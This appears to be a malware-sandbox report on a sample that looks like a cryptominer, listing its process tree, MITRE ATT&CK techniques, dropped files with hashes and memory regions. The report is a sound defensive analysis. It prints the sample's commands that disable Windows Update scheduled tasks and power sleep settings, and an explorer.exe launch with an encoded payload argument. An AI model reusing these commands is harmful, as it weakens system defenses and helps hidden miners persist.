PID:3484

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
7⤵
PID:3544

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
7⤵
PID:3472

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
7⤵
PID:3288

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
6⤵
PID:3924

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1312

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:752

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:864

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2116

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
6⤵
PID:1684

C:\Windows\explorer.exe
C:\Windows\explorer.exe clcmeewnjgen0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPBwfs6hsH6BZWYzKcgqh8/w5KES9i8iVGoln9YNKyIMIhchOv/qhVSSEyQVeeilGRs3EMCL7VVGCZZSNmGX+WhFkG6w6YtPhSONt0KQQX8lWBvZt8FTQet3u0ld4bcUsTw5fhWYnAMLoF2LOPPGYB2TrjMWdV62jpwHJofDnqBDBuWFMcEnGAyC28ts80L6HbzDjD0sBquAT4Mewl/rkK/eevnCIDRRDM/KANXpzBDbtzl320IoXjIb++yELBFh84SFIEF7L1qVd4YMHKeZwe807fKfwUBxVnRO7THuzKbYajHeg/I3SfaR6UzIZjCjwxfhgN5uZ2YUVYF2II6O4qeOY3s8Ab9cm7XC77uCy/Na4z1O1SfjGZbw/cD9kQ+XXgNvtDG6BognpyTqDH6/Yd56nhRN7gcoUiQQ2GwpUmVPUtKsvTrf3487LBbzei+Xrzzg==
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:748

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

1

T1031

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Impair Defenses

1

T1562

File Permissions Modification

1

T1222

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
Filesize
443B

MD5
f3a02a8234ba1a79da3e6c45e925851f

SHA1
ba55191b01c10a22b3008e36a4b3125411c5eea9

SHA256
c0e6fb4b810dfd281e46afbb1ff40e48214a9b2441759f5a90ff0cb7137c942a

SHA512
80e31555d0972e1c2ceb1eefb1e17cc1cfdaf8c5c1e65e60b27983bb71581486c623045d5dd30f4533f8a5aa8e1d434db7f1898b2bb3a4a74cc4c18ce423b163

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
86208842d6e6bf308bb267c0ad7b00b4

SHA1
183ad81966b26636b921baaf039b7b078e48c1a5

SHA256
8e9941b0ba32480fe4627ed1b228a54a3a6d84546f2c74be75359bc9802c88ea

SHA512
7f04b2a816498497b3a8916ba2af807e25399c967c0c5fb20985bd00b7367214983482c26624e64741ea99cd246df58ef972e64f5ab7506ecf7b994de06c8ba9

Download Submit
C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
Filesize
4.2MB

MD5
8268ff95b3aaea6d6de8f02a73c323d2

SHA1
ae470145c4f5780315b52aa1c57ae0c04a2d18ca

SHA256
529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8

SHA512
9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0

Download Submit
C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
Filesize
4.2MB

MD5
8268ff95b3aaea6d6de8f02a73c323d2

SHA1
ae470145c4f5780315b52aa1c57ae0c04a2d18ca

SHA256
529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8

SHA512
9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0

Download Submit
memory/304-300-0x0000000000000000-mapping.dmp

Download
memory/304-212-0x0000000000000000-mapping.dmp

Download
memory/360-275-0x0000000000000000-mapping.dmp

Download
memory/424-146-0x000001EAB5930000-0x000001EAB59A6000-memory.dmp

Filesize
472KB

Download
memory/424-141-0x000001EA9B4F0000-0x000001EA9B512000-memory.dmp

Filesize
136KB

Download
memory/424-135-0x0000000000000000-mapping.dmp

Download
memory/484-193-0x0000000000000000-mapping.dmp

Download
memory/748-312-0x0000000000000000-0x0000000001000000-memory.dmp

Filesize
16.0MB

Download
memory/748-306-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/748-311-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/748-304-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/748-307-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/748-308-0x0000000000180000-0x00000000001A0000-memory.dmp

Filesize
128KB

Download
memory/752-274-0x0000000000000000-mapping.dmp

Download
memory/756-208-0x0000000000000000-mapping.dmp

Download
memory/776-209-0x0000000000000000-mapping.dmp

Download
memory/812-230-0x0000000000000000-mapping.dmp

Download
memory/864-277-0x0000000000000000-mapping.dmp

Download
memory/1012-276-0x0000000000000000-mapping.dmp

Download
memory/1016-272-0x0000000000000000-mapping.dmp

Download
memory/1044-207-0x0000000000000000-mapping.dmp

Download
memory/1076-204-0x0000000000000000-mapping.dmp

Download
memory/1124-184-0x0000000000000000-mapping.dmp

Download
memory/1192-278-0x0000000000000000-mapping.dmp

Download
memory/1208-197-0x0000000000000000-mapping.dmp

Download
memory/1268-293-0x000001664B840000-0x000001664B846000-memory.dmp

Filesize
24KB

Download
memory/1268-302-0x0000016665CD0000-0x0000016665CE2000-memory.dmp

Filesize
72KB

Download
memory/1312-273-0x0000000000000000-mapping.dmp

Download
memory/1368-191-0x0000000000000000-mapping.dmp

Download
memory/1532-194-0x0000000000000000-mapping.dmp

Download
memory/1536-281-0x0000000000000000-mapping.dmp

Download
memory/1684-294-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/1684-295-0x0000000000401BEA-mapping.dmp

Download
memory/1684-299-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/1816-174-0x0000000000000000-mapping.dmp

Download
memory/1840-201-0x0000000000000000-mapping.dmp

Download
memory/1864-134-0x0000000000000000-mapping.dmp

Download
memory/1976-202-0x0000000000000000-mapping.dmp

Download
memory/2064-119-0x0000022559580000-0x00000225599BE000-memory.dmp

Filesize
4.2MB

Download
memory/2064-128-0x0000022574250000-0x0000022574670000-memory.dmp

Filesize
4.1MB

Download
memory/2064-124-0x0000022574690000-0x0000022574ACE000-memory.dmp

Filesize
4.2MB

Download
memory/2116-280-0x0000000000000000-mapping.dmp

Download
memory/2148-283-0x0000000000000000-mapping.dmp

Download
memory/2148-177-0x0000000000000000-mapping.dmp

Download
memory/2152-179-0x0000000000000000-mapping.dmp

Download
memory/2164-289-0x0000000000000000-mapping.dmp

Download
memory/2256-180-0x0000000000000000-mapping.dmp

Download
memory/2256-214-0x0000000000000000-mapping.dmp

Download
memory/2348-211-0x0000000000000000-mapping.dmp

Download
memory/2440-301-0x0000000000000000-mapping.dmp

Download
memory/2440-183-0x0000000000000000-mapping.dmp

Download
memory/2548-187-0x0000000000000000-mapping.dmp

Download
memory/2760-203-0x0000000000000000-mapping.dmp

Download
memory/2836-181-0x0000000000000000-mapping.dmp

Download
memory/2836-286-0x0000000000000000-mapping.dmp

Download
memory/2868-182-0x0000000000000000-mapping.dmp

Download
memory/2928-185-0x0000000000000000-mapping.dmp

Download
memory/2940-186-0x0000000000000000-mapping.dmp

Download
memory/2952-176-0x0000000000000000-mapping.dmp

Download
memory/3020-279-0x0000000000000000-mapping.dmp

Download
memory/3020-175-0x0000000000000000-mapping.dmp

Download
memory/3036-192-0x0000000000000000-mapping.dmp

Download
memory/3288-196-0x0000000000000000-mapping.dmp

Download
memory/3364-188-0x0000000000000000-mapping.dmp

Download
memory/3376-206-0x0000000000000000-mapping.dmp

Download
memory/3412-270-0x0000000000000000-mapping.dmp

Download
memory/3520-189-0x0000000000000000-mapping.dmp

Download
memory/3692-282-0x0000000000000000-mapping.dmp

Download
memory/3724-198-0x0000000000000000-mapping.dmp

Download
memory/3744-210-0x0000000000000000-mapping.dmp

Download
memory/3756-231-0x0000000000000000-mapping.dmp

Download
memory/3804-200-0x0000000000000000-mapping.dmp

Download
memory/3900-190-0x0000000000000000-mapping.dmp

Download
memory/3904-178-0x0000000000000000-mapping.dmp

Download
memory/3924-271-0x0000000000000000-mapping.dmp

Download
memory/3940-195-0x0000000000000000-mapping.dmp

Download
memory/3972-199-0x0000000000000000-mapping.dmp

Download
memory/4000-205-0x0000000000000000-mapping.dmp

Download
memory/4080-292-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads